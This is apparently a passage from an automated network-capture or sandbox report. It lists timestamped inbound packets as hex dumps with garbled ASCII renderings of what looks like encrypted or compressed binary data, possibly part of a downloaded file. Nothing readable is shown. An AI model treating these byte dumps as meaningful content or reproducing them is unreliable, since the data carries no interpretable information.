a9 b5 97 6e 19 d5 3a 8e 8d 5c 63 69 cd c2 b7 14 ef 45 35 85 ba 5b d4 c7 ea 16 b1 fa 5c dc 48 Data Ascii: .]@iUB1(b`H(FW)j\|~a+J`'g}\|D8f.*l"q#'WH_!n88{-{a&fB&L1koC_$0k6s9BeA9hk4n:\ciE5[\H
2021-12-01 18:25:38 UTC	39	IN	Data Raw: 35 ab ac 1c c0 c2 bc 9a 64 eb 63 d6 bc 11 9d d6 f6 f5 35 e2 2d 03 96 7a 84 30 30 3d 4a 15 f2 56 94 b2 60 d1 b4 81 d2 18 4c 90 5d d1 9c 24 01 f5 08 a1 05 f9 75 ae b2 6f 62 38 4a 29 74 f7 69 12 a4 10 93 e2 73 92 ad df c5 23 9d 57 3e 20 af 9f bc 52 ba e6 ad 82 c5 bb 3b 7f b8 ca 40 b2 40 af 37 ec 9c e8 64 c8 3a 16 94 71 aa 08 e3 79 91 b5 14 93 16 4d 97 03 3c 07 0b b7 b6 7c 1a 6c 8f ea 7d a9 82 6c 85 c1 a4 fc 85 1c f2 80 1b 08 c3 2b 81 4e be 8f ff 6f de 82 2a bf 75 92 97 99 e9 58 e1 de f1 10 7d 0d d0 8b f7 17 da e5 0d 5e f7 de 19 91 00 d1 30 1d db c1 c7 ed a5 34 6f 02 38 2f fa ae ad ed c0 f7 90 4e 77 97 8d a4 3d 91 1c 2d 20 50 b3 55 72 8b 58 d4 46 fa 2b 8d 90 0f 7c 59 60 f5 f0 e3 50 c0 f9 ce c7 17 79 bd 20 13 4c eb c5 43 32 b7 9a e8 d1 0f 66 de a8 d5 e0 01 8a Data Ascii: 5dc5-z00=JV`L]$uob8J)tis#W> R;@@7d:qyM<\|l}l+No*uX}^04o8/Nw=- PUrXF+\|Y`Py LC2f
2021-12-01 18:25:38 UTC	40	IN	Data Raw: 49 57 d8 2d 34 d4 c1 5b 12 7e b7 8b d6 23 bc 0f 9e a3 6b a1 5a e7 d5 16 2b 65 89 67 5c 61 1b 6b 24 fb 73 1d a7 72 40 92 b6 cf b7 e1 f0 57 7a 80 e5 2c 98 4d d6 06 3e 61 71 f5 47 0c d1 70 ea f7 c5 17 16 a7 ed 8f 97 4a f6 36 e5 da b5 d9 70 4f 7a 51 ce 16 ba d5 c0 b3 f7 c6 45 27 7a ce ac e9 18 ea 3b d6 bf e5 54 30 87 c3 b4 85 91 ee 8e 61 f7 a5 38 d7 7c 5d 90 f4 5a 53 b3 39 bc 4c 3a 91 87 cc b4 4f fd 7e 1f 32 54 da 09 2d ee 5e ad 47 05 00 fa 83 4b fc 6d ec 32 b4 b0 64 9c a2 00 46 1e 3f 3b d7 f5 1f 79 07 44 ae 47 2b c9 08 66 5b b0 c3 a0 79 84 03 5c 37 b3 aa 88 9a 6d 86 5e f4 95 5d 8d 75 e5 32 0e 8e 73 9e 4e 36 6d c6 4c 33 58 a5 94 8e 33 8d 3e d9 03 7e 54 ed ac 43 3f b9 28 fa ac 5b 89 2c 91 bd c1 e1 58 04 90 7e 47 cc a0 c1 92 f8 0b 2d 1e fc dc 54 37 30 ad 95 f9 Data Ascii: IW-4[~#kZ+eg\ak$sr@Wz,M>aqGpJ6pOzQE'z;T0a8\|]ZS9L:O~2T-^GKm2dF?;yDG+f[y\7m^]u2sN6mL3X3>~TC?([,X~G-T70
2021-12-01 18:25:38 UTC	42	IN	Data Raw: 9a d2 9b a3 80 fd aa 39 e3 40 0c 4b cd 8c 14 62 83 02 24 e7 8e c0 51 10 b9 ef 94 eb d4 75 14 ce 8e 27 38 d0 73 37 45 53 17 70 ba 42 22 04 ef 01 19 a0 f8 79 1c 86 a6 15 85 be 74 e4 69 ca ac ff c1 df 84 29 57 75 bb 8e 66 16 65 21 ba d9 41 a0 c1 69 27 f7 df fe d1 c4 3e 62 21 c2 37 96 f5 27 96 dc 05 cb ed ad 3c d7 d7 22 00 d9 da 1c b9 42 bb 7e 4e 1f 90 02 1a 28 d3 91 bb a5 1b 8b 91 f2 68 85 2b b9 f4 6f ca 44 b3 d6 2d dc 4b c5 1c 56 55 1e e2 d3 e7 22 92 63 67 43 e3 be e7 f8 22 64 51 c9 c2 99 ab 23 f9 e0 29 f0 79 09 11 32 ba 2e b7 60 64 11 f0 e5 91 33 9a 95 98 60 1b 2a 85 d0 a4 4e 20 fd 8a ce 94 87 63 38 14 55 dd df 23 e1 38 df 0f f4 84 3b eb e8 a6 c0 c0 9d ea 30 dd 04 7c f5 cc 5c ad 81 a6 c3 aa 73 d5 0a 27 f4 87 18 56 c6 75 a0 7f 52 ef 53 9d 09 48 9a d6 e5 02 Data Ascii: 9@Kb$Qu'8s7ESpB"yti)Wufe!Ai'>b!7'<"B~N(h+oD-KVU"cgC"dQ#)y2.`d3`*N c8U#8;0\|\s'VuRSH
2021-12-01 18:25:38 UTC	43	IN	Data Raw: e3 b2 2a c5 9b b6 24 07 ce ae 17 0f a9 76 e9 4f ec 41 cd 0c 3b b6 f1 f7 05 be 76 93 e1 82 f8 7e 4d b8 27 17 0a 30 39 0c a0 c5 6e 64 ef d4 13 34 0c ad 25 f9 00 c2 8c 4a 1c b6 9b 1e 87 fc f7 c7 1c 6c ec 9d d8 ed 9f 45 35 87 1a d4 f7 bb ec 68 a2 86 33 a9 ad fa d4 61 7c ab 4e 9f 1a 48 3a b0 32 4b e5 00 c9 9f c7 59 b7 49 4b b5 ad f6 91 d7 f2 50 5c cd f9 bc c9 0f 33 5c 9a cf f0 96 23 be 45 7b ca 4b 37 a4 8c 56 7f 49 1b 0d 5f 6d 20 6f 49 3e cf d9 b7 00 89 56 e7 bf 01 e6 31 e8 de 13 5f ac e3 62 e9 33 fc 80 8e 2b 50 6b 65 3f 58 fa 0e 93 bf 0b 66 21 79 a5 eb c0 bf 99 03 d6 42 49 7d d9 90 4e da dd c1 79 18 b6 3b cb 95 d1 86 24 e9 a7 d4 ae 99 92 94 a1 8f dd 0d d6 50 57 f8 a9 fc 9e 7d 32 84 39 23 a9 e6 5b e9 51 a3 a3 18 af 09 df 26 52 57 21 f1 58 97 09 fd 47 e6 25 7e Data Ascii: *$vOA;v~M'09nd4%JlE5h3a\|NH:2KYIKP\3\#E{K7VI_m oI>V1_b3+Pke?Xf!yBI}Ny;$PW}29#[Q&RW!XG%~
2021-12-01 18:25:38 UTC	44	IN	Data Raw: a5 70 cb 4c 85 6d 6d 20 fb 69 88 07 5f c1 4a 25 18 90 0a d7 f7 2f fa da 0b 74 a7 44 eb 1f 1f 7c 8b 5b e8 08 e3 20 df 24 01 41 6e 18 95 2b 34 29 ae b0 6b f0 ac 12 83 27 ca 6a a9 aa b2 68 9a 0a 48 bd 20 15 f9 be ba 6a f4 8d 12 e4 8e 2b e2 c6 a0 3d 98 48 fd e8 b5 63 80 a7 8b a0 be 73 15 ec c2 e3 c6 4a 08 1d 04 b4 5c 3f 7c c1 95 7a de 8a ba 2d 0c fb 38 25 d1 dd df 2b a8 50 ad b5 f7 5f 6e e7 65 f6 d7 ec 74 7f cf 3c 49 84 15 8d a4 52 28 dc cf 20 37 6d 33 4f f4 1c 65 b2 a5 23 ae da 62 46 c4 cd 68 fc e9 a4 57 79 fc 19 07 3b 48 f3 45 56 3c 99 28 c9 6b a7 12 e8 38 ff bd 0a d8 7a 76 37 20 19 90 fe ab cb 79 9b 31 62 a9 9b 51 f8 af 42 5c 0c 72 2d 9f 82 f4 7a 19 94 a7 61 a3 de 6d 03 96 05 b4 c1 cf 66 6e d3 a0 20 50 65 b1 c9 08 54 b3 09 df a8 cd 48 a3 df 41 09 69 e2 69 Data Ascii: pLmm i_J%/tD\|[ $An+4)k'jhH j+=HcsJ\?\|z-8%+P_net<IR( 7m3Oe#bFhWy;HEV<(k8zv7 y1bQB\r-zamfn PeTHAii
2021-12-01 18:25:38 UTC	45	IN	Data Raw: 11 7c 61 82 87 38 51 1a a0 28 0f 48 74 1b 64 de 0a 35 6b 05 7e 47 13 5e f9 6d ca 71 90 f7 e0 f5 a3 9e 7b b9 94 41 ea 58 f7 17 34 37 c9 d1 8f a2 ec 0a be 24 3f cf d0 7f 27 5f 80 3b 2b e2 17 ef 00 ec 1e 42 a8 b6 e2 05 ff 61 b6 2d 1e b2 c7 7f 2e 46 16 28 8d 50 6b 1d 3f 7d f0 0e 93 bd 33 1a 20 df 1a 14 3f 62 b4 1f 5d 46 95 a7 1d 5d 4e a0 ab 5a 79 b7 b8 ba 4b 40 9c c4 71 04 b7 5b 51 ed 5c ac a1 8f 89 1a 59 b4 40 c4 7b 5a ea 58 96 e4 f3 9d db 54 14 4c 6f c0 df 59 00 7b c4 aa b6 ce e8 0e 2a 51 c4 d1 97 8d 32 16 2e bd ee 52 03 eb 1e 18 df d0 00 ca 25 e6 e8 48 7b 49 30 8b 2b da 2f b2 a0 24 b4 4f 21 db 75 f6 4c 0b 2c 9b bb ad 49 57 d8 1c 57 9a 99 82 c4 fc b2 ff 32 af 16 22 02 b5 3e 56 3a 59 9f 3d 9c b2 2a 41 40 e0 f2 77 b4 72 58 9d 95 4b 2d e8 0d 18 5c dd 21 85 01 Data Ascii: \|a8Q(Htd5k~G^mq{AX47$?'_;+Ba-.F(Pk?}3 ?b]F]NZyK@q[Q\Y@{ZXTLoY{Q2.R%H{I0+/$O!uL,IWW2">V:Y=A@wrXK-\!
2021-12-01 18:25:38 UTC	47	IN	Data Raw: 2e 05 ee cd 37 9c 95 cf f9 0e ee 9d da 8b 9a 85 67 b6 c2 24 78 2c 29 cb c9 be d9 31 fe 87 3c 54 d3 21 22 20 99 ba 84 52 4a 08 db 32 b8 38 7a 3f b4 42 34 30 b7 04 91 34 49 99 65 d7 59 14 aa 73 af b6 8f f4 97 18 07 2c dc a2 ee ee f8 d4 a3 e1 bd 62 a6 ae fd 75 44 29 82 92 2a cc 82 e7 19 4a 22 fa 58 42 ee f2 c3 ed 87 95 10 d6 b9 eb e6 e6 f2 fb 46 34 37 31 da 28 64 ae 2a 79 7d 11 84 9a 14 7a fa 4a f1 dd 57 33 f2 26 4f 92 55 75 66 88 80 cf eb 59 c3 d8 9e af 04 a6 37 1f 82 8d 84 9a a3 12 71 ee 0f a9 7c 64 9a d7 9d a0 91 e2 b0 74 0d f5 80 09 20 c5 64 40 e0 58 fd e6 94 b7 cc c4 42 88 24 b4 2d 22 35 70 da fe 15 6e 24 9d 5f 79 18 21 49 c4 1c 51 43 d0 d5 aa 66 64 1f e0 e9 3e ce 75 7b f2 85 eb 24 1e a2 28 99 36 ff 36 90 18 4b 41 e8 e2 58 74 da cd 76 a8 3a f9 a0 21 2a Data Ascii: .7g$x,)1<T!" RJ28z?B404IeYs,buD)J"XBF471(dy}zJW3&OUufY7q\|dt d@XB$-"5pn$_y!IQCfd>u{$(66KAXtv:!*
2021-12-01 18:25:38 UTC	48	IN	Data Raw: b3 f6 e8 d2 9a cf 26 e1 b9 9e 05 36 3c f3 04 40 e9 f1 b6 de 3d 04 85 8d 98 d8 49 14 4b 95 20 eb 7d 54 c5 d7 1d 79 8c 6e ae ae 99 f1 b6 52 c2 6d bc a2 91 74 77 b1 a5 98 b5 66 97 4d 62 06 e6 06 2d 5a e7 20 a6 50 7b 0c 96 a7 21 9f a1 2a 0c 00 96 a0 75 da 81 17 c7 c9 2c 89 d0 cb 18 06 dd 3d 7a 25 e6 63 b8 02 1c 88 b4 db a2 d5 74 80 e6 00 40 30 9e 58 f8 d3 e2 50 a4 cb 02 77 a5 d0 5b a8 ca 14 42 e1 cc 85 89 32 00 62 b9 a8 39 e9 61 61 a6 14 7a 7b 2a 97 8c 82 20 5f b3 25 5a d8 0e 32 3f 3b 09 5f 95 11 86 bc 2c 77 d5 2c 78 11 f9 e2 1f 18 5e 23 b5 8c d1 26 a2 6f ac 5b cc 5d 24 cb 0f 6d 2f 2d 39 d0 d1 80 48 b8 3d 55 07 37 20 93 82 ea 48 c4 80 8f 57 31 a3 cd 41 e3 ac 4e 69 10 f9 ba 30 9e 30 aa dc 0d a9 d1 57 6b d4 09 5d 87 0b 32 49 cd 02 5a fb 0e 17 70 82 cc a4 2f ef Data Ascii: &6<@=IK }TynRmtwfMb-Z P{!u,=z%ct@0XPw[B2b9aaz{ _%Z2?;_,w,x^#&o[]$m/-9H=U7 HW1ANi00Wk]2IZp/
2021-12-01 18:25:38 UTC	49	IN	Data Raw: 0b 05 93 da 15 14 8d 0b 48 60 a0 47 94 d3 4f 01 15 35 ed ed 9c fc c8 b5 a3 8e 07 0a 3a 46 5c f7 a6 d4 46 8c 58 a0 f6 c9 9a 89 fe c6 64 7d 61 fb 02 7a 4e 91 13 49 b2 d5 bf e9 54 f8 4f aa e3 47 85 de af 8d 6a 4a 93 c3 a1 84 f0 23 cb 93 65 06 c1 0e 60 5c 96 f5 21 57 d7 58 8a dc f4 80 82 24 7c 00 28 a2 e2 0b 6d 83 e1 ce 8a 52 30 a6 9b 2d 4a 2e 7e 2f fe fd ca 9f 31 d8 b3 15 cc 66 ea f4 cb 23 86 83 aa e0 b8 ff 61 a8 84 1a ba b8 b3 0c 84 29 1f a2 28 1b e2 19 3b f4 f9 8e c9 be b4 30 45 dd 58 8b dc cc c8 f0 5d 7e 88 86 44 12 38 da 04 76 f9 49 e4 b8 b1 55 7b b4 ff 0f 7c 45 fc 27 ca 03 69 9b 76 90 de 8e cc ff 0e f1 0f 55 a9 cb 1c 27 d2 a0 bb 3d 2d e2 bb 61 a9 f0 3e cb ad 01 68 f2 f7 0d 3b e5 85 4f 01 29 cb 6c 06 d6 7e a1 9b 61 1f 1e d3 a5 d1 de 12 41 2f 0c eb 41 53 Data Ascii: H`GO5:F\FXd}azNITOGjJ#e`\!WX$\|(mR0-J.~/1f#a)(;0EX]~D8vIU{\|E'ivU'=-a>h;O)l~aA/AS
2021-12-01 18:25:38 UTC	50	IN	Data Raw: bd 5f e5 ac 6e be 7a 34 a9 9f d3 40 28 9b c1 bc 67 18 01 3a a9 b5 be 40 7a 8b ab 6b f4 15 98 91 23 9b 72 70 3a 9f b4 5c b5 20 a4 86 18 c9 0e 49 01 78 cc a5 dd aa 1f a8 d2 64 34 ad 9d 83 a1 5e eb f8 0e 45 69 32 57 b5 77 70 67 76 7b 8d dc 96 59 7e 2f 4c d5 ca b0 81 7b e7 81 13 38 51 f0 84 10 53 b8 11 eb 16 fe 9f 3d 01 17 1e f7 ed 3b 41 46 4c 99 a1 3f 6b a7 cf 20 6d 27 60 ca 79 42 8a 47 55 19 e2 38 b7 17 cb 07 26 c6 76 3d f7 2a bb d9 9a 7c 72 2a 84 82 f4 74 ab 64 03 4b 97 64 6a de 32 b9 d4 48 b6 14 1c 47 f1 89 af 8d 6c 02 07 20 2f d4 72 90 e4 3a 11 e7 37 90 e0 1d cf ae d6 5d db a8 8a 37 57 7f 7d 24 3c 9c a8 ac 40 9e 9e 5e 79 ad c6 98 9f d8 51 60 ce 56 c2 cc 01 ea e5 59 6e 86 63 d1 6a 1a a8 77 c4 ca d0 58 64 e5 53 7a ec e9 d4 ff b7 de a2 5d 3d 2b d0 4a 46 79 Data Ascii: _nz4@(g:@zk#rp:\ Ixd4^Ei2Wwpgv{Y~/L{8QS=;AFL?k m'`yBGU8&v=\|rtdKdj2HGl /r:7]7W}$<@^yQ`VYncjwXdSz]=+JFy
2021-12-01 18:25:38 UTC	51	IN	Data Raw: 8f c2 04 a1 a1 d7 cc 17 55 48 2a 64 c0 fe bb 4b 4c 67 3f 09 d9 26 f1 52 5a 30 d1 e7 61 ba 75 25 cf 90 df c0 9c d1 10 2b 1f 1f 73 78 08 4e 00 4e 3e 86 c3 cb fd 83 ed d9 3d 81 30 3d 0e ad e5 f5 48 a7 09 92 90 09 5b dd 1b 9a a5 96 dc ae 84 95 9d 56 19 5b 54 5a 8f 08 23 a6 83 99 b1 4b ca 12 b0 d5 e9 40 28 17 75 d3 01 95 06 e0 50 b9 c7 15 e4 d0 54 e1 41 e3 b8 38 fc 44 91 f6 a7 a7 1e 32 f4 5e e8 f1 b8 b9 d3 39 2d f4 6a b7 68 52 74 f4 c4 02 b2 25 8f e4 46 29 e4 26 27 40 15 75 e6 8f a9 30 1d d0 26 64 3b 84 b4 9f 78 3c 54 e3 75 8c 4a 83 00 ed 91 b8 57 d4 9b ee 6c e1 55 c9 c0 b3 44 4c 70 8b 3e ae 6b 2d c7 f7 26 bb b7 40 bb d6 0c e7 d3 18 46 2c 20 b0 65 ae 3b 43 52 4d bb 9f c0 e5 33 aa a9 69 61 b0 a6 31 e4 6e 78 ba 87 cd c1 12 9c c3 83 2d 8c 30 fc ae 2c 42 51 39 e0 Data Ascii: UH*dKLg?&RZ0au%+sxNN>=0=H[V[TZ#K@(uPTA8D2^9-jhRt%F)&'@u0&d;x<TuJWlUDLp>k-&@F, e;CRM3ia1nx-0,BQ9
2021-12-01 18:25:38 UTC	52	IN	Data Raw: 3e 40 70 6a 18 56 96 92 65 f4 bd 40 21 88 4d ed 01 17 53 02 8a c9 d5 b1 9c 36 60 82 e5 c5 21 83 98 d5 05 95 ba 32 5d 86 95 aa 9e 3d 6c 21 2a cd 77 46 34 37 50 d0 82 e9 e9 40 a6 9a d6 c1 52 be 26 7d 0b 78 11 e4 b0 0f 32 50 d3 55 75 11 b9 7f c0 6f 4d af 5f df 9c 56 6c 02 03 f8 b3 7b ef dc 10 80 42 58 fa 95 b0 e2 e3 69 a2 93 22 5b 27 db a5 7f f7 a3 8e 71 10 93 a3 61 e4 15 c2 69 08 7f 94 67 8a c5 dc f6 00 91 a7 9e 23 6a ba 28 79 49 fb 58 40 48 e9 d1 2f 56 e5 e5 2f 6a 14 be d2 9a 7b 72 0d f3 ef 64 12 f5 c3 23 54 74 b9 d1 91 27 9a b9 6f 1d 0d d4 ce db da 80 50 7b 10 6f 0b 82 3e fb 20 20 70 84 1e e5 86 3d 1b 2e 1a 69 31 f2 54 45 97 c9 82 94 36 41 bc dd c2 56 3d be 5f 10 02 67 29 e5 54 b2 3d 75 29 ba db ff b7 1d 9d 00 00 1b 1e 08 97 e5 4c c8 37 1a 7b b2 9a 54 b5 Data Ascii: >@pjVe@!MS6`!2]=l!*wF47P@R&}x2PUuoM_Vl{BXi"['qaig#j(yIX@H/V/j{rd#Tt'oP{o> p=.i1TE6AV=_g)T=u)L7{T
2021-12-01 18:25:38 UTC	54	IN	Data Raw: b3 b4 df d2 74 9a 76 9d d3 9a 44 e1 12 9e ad 05 94 02 9b 81 ca c9 54 d3 b1 6b bf ff dc 54 be ca ae ee 8b 33 03 3b 82 c6 60 d6 0a f2 84 29 90 6c d8 6d bf 82 f4 77 d3 ca da fd 2c 60 77 db 40 57 7e 30 9b 44 fb 3a e9 7c 75 8c a5 a2 9f 69 89 82 20 92 fa ac 98 02 3c 54 f6 e2 4c fe 2c 4d 25 bd b8 e8 a2 fd a5 e8 88 24 05 8c 1c 21 b8 96 e0 44 91 4f ae 74 e5 e1 26 fe 77 ac 5b ca 54 08 bf 6a 70 4c 3a 66 39 c6 ef 61 0c 36 58 23 92 85 2d 00 c5 c8 6b f2 4e 36 29 1b d6 64 e4 bb 42 a4 cb 22 3a d7 8b 8e 55 dc 04 75 11 b0 99 67 d2 c0 2a 7e 05 3b 7f 96 a2 04 ce e8 02 a6 0c 32 86 16 0f 32 d6 34 35 6e 4d 20 1b 8d 23 18 0e 13 e5 fd 44 1a 9f ce 20 9f 8d 5b 61 d8 e9 8d aa ef d1 86 b4 6c 34 d8 7a 5a 2e 86 33 29 49 a2 6d 20 6e c5 55 ed 7b b5 c6 60 e8 aa 87 0a 4f ee 46 da 1c 6a ec Data Ascii: tvDTkT3;`)lmw,`w@W~0D:\|ui <TL,M%$!DOt&w[TjpL:f9a6X#-kN6)dB":Uug*~;2245nM #D [al4zZ.3)Im nU{`OFj
2021-12-01 18:25:38 UTC	55	IN	Data Raw: df af be 21 18 a9 f0 2a 46 9e 28 c8 4e 02 84 e4 ce b1 96 df 8d c1 02 68 a7 9d 3e 37 84 82 fa fa 88 11 63 9f 69 61 86 e1 ce 59 b3 2d db ae 08 a9 cb f7 04 fe 9e ad b5 f7 db 7d 10 fe 5e f9 0b b4 06 a3 94 21 6a 28 e0 94 e2 0f 3f 0e 11 02 79 8e 10 1f 49 2a 43 2c cc 6d 59 52 a4 f1 44 b7 58 06 4a bd fa 16 c5 01 dc 72 6a 88 eb ea 67 3f 8a 70 6e 91 53 e7 b8 7a 7e 81 b7 74 83 d4 61 78 36 35 7e c5 6a 76 90 8f 99 67 aa 0e 92 e8 b5 3e 76 a5 29 6a a3 ed 5f c4 0e bc 1d be 7b a7 a4 a4 fe b0 19 cf 0c 6c 1a 1b da 14 00 89 e1 e2 03 2b f7 10 80 c3 d3 a8 1b 5c 38 1e c6 6e 0c eb f5 1f cb 7e 6d f7 15 ca 8b f7 4a 68 e3 98 b7 56 71 72 4b 31 17 ec 32 67 8f 05 fa b8 4d c9 00 61 90 ea 16 b1 28 e9 af 8c 0d 7d f4 e3 2a 64 f6 2e f5 28 e7 ee 3a 91 b2 d6 12 35 e6 c3 46 4d 0b 5e 72 a7 93 Data Ascii: !F(Nh>7ciaY-}^!j(?yIC,mYRDXJrjg?pnSz~tax65~jvg>v)j_{l+\8n~mJhVqrK12gMa(}*d.(:5FM^r
2021-12-01 18:25:38 UTC	56	IN	Data Raw: d9 5a 61 d2 73 8c 56 e0 d1 ad 3f 2d 47 d0 d8 e5 91 4a 6b 88 c0 b3 44 b4 72 7a 53 eb 96 dc c7 4c 94 3a a3 f6 1d a4 41 9d da 94 06 b7 de c5 99 ef 2c 7f 20 8c 36 41 eb 31 a3 8b a1 0f 37 3b fa c2 1d bc 8e 41 0c 1b 13 a1 ee ee 04 d2 75 5d 9d fa 07 cd 1c cd 08 66 64 f6 d0 47 c3 6d 40 e5 ff b2 95 02 a5 7b 02 8c 6c 6e ef 3e a5 2f b8 7b 4a f4 34 4c 15 9d f6 24 18 f2 3f 4f 3e 8f 8c a4 b4 19 91 17 99 e9 b7 25 27 9c a5 79 15 e8 8b f7 17 ea 84 66 09 cf 64 76 dc 04 81 d8 81 b9 98 38 9f 82 c7 df d3 e2 20 88 68 2f be a5 fe a0 1e 1f 28 12 1a 28 6d 97 33 df 24 75 61 72 46 c9 d4 46 f4 8a 2b 0d 4e 29 5f c1 47 4f 8c f6 55 1e c7 a2 27 43 aa 1c d6 bc 6e 8c 47 bd 9c 9b 3c 9a b7 bc c1 af 65 79 e1 85 24 f8 06 a7 33 ee 06 f4 dc bd 8f a7 31 74 65 d5 15 2d bf 4b 5c 62 29 cb 78 7c 8e Data Ascii: ZasV?-GJkDrzSL:A, 6A17;Au]fdGm@{ln>/{J4L$?O>%'yfdv8 h/((m3$uarFF+N)_GOU'CnG<ey$31te-K\b)x\|
2021-12-01 18:25:38 UTC	58	IN	Data Raw: 1c 06 77 90 1c 81 25 61 97 a4 11 d6 42 74 a8 ad c0 64 9f 3f 05 23 da fb 44 81 70 84 10 64 5a 31 ae ba 7d 8a 6d 07 16 15 29 99 bf 87 40 6d d3 f8 34 dd cd 7f f1 6f 3e 41 80 89 99 8d cd 73 17 b6 24 8a ce a7 08 a0 3e bf bc 01 68 97 82 f8 d3 a0 55 bd 9a 11 04 21 90 2f 86 be 10 68 fc d3 a3 6f 21 5e f4 41 91 f3 8e 11 ae dc 06 a9 b9 11 a7 a0 7c 31 51 6e 16 53 da 34 8a f3 6e de f3 25 19 24 ef 45 47 41 29 b7 2a 06 40 62 d6 4c 28 56 88 05 43 fe 62 32 c7 3d f7 58 d7 d9 48 74 1b 5f 3d 0f 58 a7 48 49 bb 96 5d a4 af 16 fd d4 57 b0 1d 8f 9f c1 ba 94 a4 be f1 1d 62 d4 c8 c9 2f 32 02 06 05 0b 5b 3f 53 99 c7 e5 b3 15 76 1b 21 11 66 b0 54 73 e3 c3 08 69 43 5a a1 2b 68 bb c0 75 8f 4b 4e 83 3f 51 92 26 f1 5c d7 b0 7a 9c dc dd 75 36 3c 9e e2 4b da 7c aa b6 53 c4 bd 74 f0 0c 1b Data Ascii: w%aBtd?#DpdZ1}m)@m4o>As$>hU!/ho!^A\|1QnS4n%$EGA)*@bL(VCb2=XHt_=XHI]Wb/2[?Sv!fTsiCZ+huKN?Q&\zu6<K\|St
2021-12-01 18:25:38 UTC	59	IN	Data Raw: 14 2b 7d e5 32 72 23 c4 e8 16 b1 95 8f 17 59 61 6f 6e eb 2f 1d 8c a2 4a 42 ba 76 e3 51 ad 9b 06 96 13 91 37 44 b3 c3 2d 74 36 99 63 46 71 7f 8b de 55 54 05 d4 58 7c 33 8f a8 d1 f2 b0 8d 2c 31 7a f0 7b 7e 27 e2 18 8d 81 e9 b4 e4 97 61 57 a2 cc ae d6 19 59 fa 14 26 83 7d 8b 5b d7 53 e3 2b 08 8b 73 e5 be 7c 7d 76 ef 5b 1d c2 d0 2b 39 82 64 1f 55 97 56 21 ad b3 3f 82 41 3c 20 67 d4 9a 32 37 24 22 4d e8 b2 1a 6a 54 5f b8 30 d1 5b 24 f2 8e 9d ba 24 1f 60 e6 ed ea 56 4a bf 72 c0 f3 9f b4 28 8f 48 79 23 d2 4e 8a ce 73 cb 17 f8 d9 31 49 df 5f 72 cb 47 0a 7a 95 b6 85 79 92 01 0f cd 80 b3 4f 05 61 f4 cd 51 89 db b1 85 04 b3 a0 bf 08 94 c7 95 11 ca a8 76 22 a2 34 98 25 e4 d6 16 d6 91 b2 11 14 7b 50 7b 94 33 86 ec 55 8a af 44 32 bd 9a 2a 88 f8 c7 e7 eb 9e 54 a2 bd e2 Data Ascii: +}2r#Yaon/JBvQ7D-t6cFqUTX\|3,1z{~'aWY&}[S+s\|}v[+9dUV!?A< g27$"MjT_0[$$`VJr(Hy#Ns1I_rGzyOaQv"4%{P{3UD2*T
2021-12-01 18:25:38 UTC	60	IN	Data Raw: c4 0a 38 d7 a1 ef 7d 37 ec 16 e4 e2 76 8d 9b 35 c5 c1 50 52 61 0a 0c e8 40 71 00 24 dd 8f c3 43 53 a8 64 d2 d2 a2 93 79 c8 6f 7f 47 7a 43 31 a1 f2 6a 53 8c 6b d4 44 d8 89 9c 05 41 86 ae 7c d6 c7 b2 0d 7d 0f 44 81 2e e0 00 77 c2 f7 4d fe 63 3b a2 fb 1f 8e 5f 05 d7 39 28 eb bf d1 46 2c 6b dd 0f e0 e7 7e bc 26 d3 fa e7 4c 01 38 1b 4b bf 0e 1c 0f 18 3b 5d 6c c9 52 aa 5d 58 b6 62 57 f0 29 63 42 55 ab 22 73 7e 8a 56 f3 77 d2 82 72 52 13 89 7a cf 44 19 84 79 b9 09 76 cb 88 55 3f 52 bd 42 0b 03 1e 7b 5f f0 70 05 b1 c1 ee 60 a8 3f 47 48 11 33 1c ae e6 a4 ae ed c9 c9 61 3e 85 71 65 5b 57 57 49 fd b8 65 be 84 5e d3 a9 e6 5b e9 25 a3 a6 df af 09 02 03 a6 57 15 0d 3d a1 f0 ea e3 9d d8 aa 9a 42 92 23 77 5a ae 8f 9c c7 ff ca ae 2d 8b be ca 3b 82 c0 f7 7f 67 5a e1 33 f8 Data Ascii: 8}7v5PRa@q$CSdyoGzC1jSkDA\|}D.wMc;_9(F,k~&L8K;]lR]XbW)cBU"s~VwrRzDyvU?RB{_p`?GH3a>qe[WWIe^[%W=B#wZ-;gZ3
2021-12-01 18:25:38 UTC	61	IN	Data Raw: 63 fe 0e 77 2c 00 95 c0 e4 6e 6c 20 5e 3e f0 95 21 e8 db 32 63 bd 11 5d cc 7c 59 60 f5 2c 1d a1 99 21 c0 a4 17 bb 28 da c1 4f cb 6c 69 79 1f 93 b9 0f 48 75 f8 2b 60 fc f2 fe dc bd 84 cc c8 50 bc 46 9c 15 72 72 1d ca 9a 8a 2e a8 c2 e8 c8 a8 e9 bf fd 76 fe 4a fa ed 36 89 c2 84 a9 6b a8 7a 07 92 cf c1 8a b9 fa f8 21 62 fd c5 80 65 3c e8 95 11 5e 1f ad d7 d2 15 7c e5 f7 01 b0 33 d2 e8 26 ff ba 25 24 34 99 e1 35 d2 6f 60 64 ce ba fc 11 7f 3b 40 9f 72 3e a1 71 62 6c 56 57 c6 6e 7c 77 ed ac 52 de 94 80 a8 e6 6f b5 92 11 35 37 d9 18 03 80 ff 2c 63 25 ec 7b 65 27 63 9d e3 b1 56 10 4f 43 9f e1 9d d1 c2 e8 3c 80 42 6e df 50 a0 20 26 c8 0d ca a2 5f 68 01 62 d5 62 3a 63 42 45 ac c8 94 d3 69 c1 45 94 58 62 3a 70 40 8d 2b 65 65 40 e0 69 ec 31 2a 48 ba 08 8f 98 da 25 d2 Data Ascii: cw,nl ^>!2c]\|Y`,!(OliyHu+`PFrr.vJ6kz!be<^\|3&%$45o`d;@r>qblVWn\|wRo57,c%{e'cVOC<BnP &_hbb:cBEiEXb:p@+ee@i1*H%
2021-12-01 18:25:38 UTC	63	IN	Data Raw: 3b 93 82 3b f1 de 43 d2 11 ae cd cf 38 8a 23 be fb c0 d3 97 96 52 fa 1e ab b0 07 a5 3c 5c 36 6f c2 59 11 f6 27 38 f4 89 76 57 1e 96 db 43 25 82 d2 6a e7 0f 04 b2 19 f2 92 8a 8b 4c d5 28 ef b8 a7 3f cb 53 ea b9 82 1b 47 b4 19 0e fa 2a 73 08 f0 c3 e7 b3 3c 3e 7f 86 13 64 f5 81 9b 95 08 c7 c1 0f 2b 90 27 19 12 a7 f7 15 8c 6b a4 23 d7 c9 94 62 20 35 ad 31 5f 6a 9a 11 98 58 b1 d0 a6 50 f6 fb a2 00 1d 36 7a 24 5f 7f 61 38 fe dc d6 11 7f 2d a9 37 2f 18 0f d1 20 b5 82 a6 0e 62 41 82 47 95 48 51 f7 d5 d4 0d 9a 63 16 cf 49 8a 23 c8 2c 6f 05 58 ce 61 7c 03 b3 c0 4c e4 8f 64 44 26 89 